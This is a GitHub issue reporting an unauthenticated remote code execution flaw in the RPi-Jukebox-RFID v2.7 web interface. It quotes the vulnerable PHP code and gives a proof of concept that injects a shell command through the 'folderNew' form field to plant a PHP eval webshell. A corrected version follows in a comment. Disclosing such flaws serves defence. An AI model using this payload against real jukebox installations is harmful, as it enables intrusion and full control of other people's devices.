search

MiczFlor / RPi-Jukebox-RFID

A Raspberry Pi jukebox, playing local music, podcasts, web radio and streams triggered by RFID cards, web app or home automation. All plug and play via USB. GPIO scripts available.
http://phoniebox.de
MIT License
1.33k stars 395 forks source link

šŸ› | RPi-Jukebox-RFID V2.7_RCE_3 #2398

Open xjzzzxx opened 1 month ago

xjzzzxx commented 1 month ago

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)

Analysis

The path of the vulnerability: htdocs\manageFilesFolders.php

if(                                         // Line 90(Check point)
    isset($post['folder'])
    && $post['folder'] != ""
    && file_exists($post['folder'])
    && is_dir($post['folder'])
) {
    $moveFolder = $post['folder'];          // Line 97(Source)
} else {
    $moveFolder = $Audio_Folders_Path;
}
if (
    isset($post['folderNew'])
    && $post['folderNew'] != ""
) {
    $moveFolder = $moveFolder . "/" . $post['folderNew'];   //Line 110(Source)
    if(!file_exists($Audio_Folders_Path . "/" . $moveFolder)) {
        $exec = 'mkdir "' . $moveFolder . '"; chown -R pi:www-data "' . $moveFolder . '"; sudo chmod -R 777 "' . $moveFolder . '"';     
        exec($exec);    // Line 115(Sink)
    } 
}

Source from Line 97 ($_POST['folder']) and Line 110($post['folderNew']).

And then there is a check point(Line 90) ,which we should set $_POST['folder'] = 2 to bypass.

After bypass the check point, the source(tainted) pass to $exec and exec($exec);(Line 115) without another check.

Poc

POST /htdocs/manageFilesFolders.php

Data:

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is the version without url encoding for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell3.php ; echo "hello

Manual verification

5

6

The attacker can then easily connect to this webshell(/htdocs/shell3.php)

Logs

No response

Configuration

No response

More info

No response

xjzzzxx commented 1 month ago

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

POST /htdocs/manageFilesFolders.php

Data

ACTION=fileUpload&folder=2&folderNew=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell3%27%5d)+%3f%3e%22++%3e+.%2fshell3.php++%3b+echo+%22hello

Here is Data without url encoding for ease of understanding:

ACTION=fileUpload&folder=2&folderNew=hello" ; echo "<?php @eval(\$_POST['shell3']) ?>" > ./shell3.php ; echo "hello

Manual verification

15

16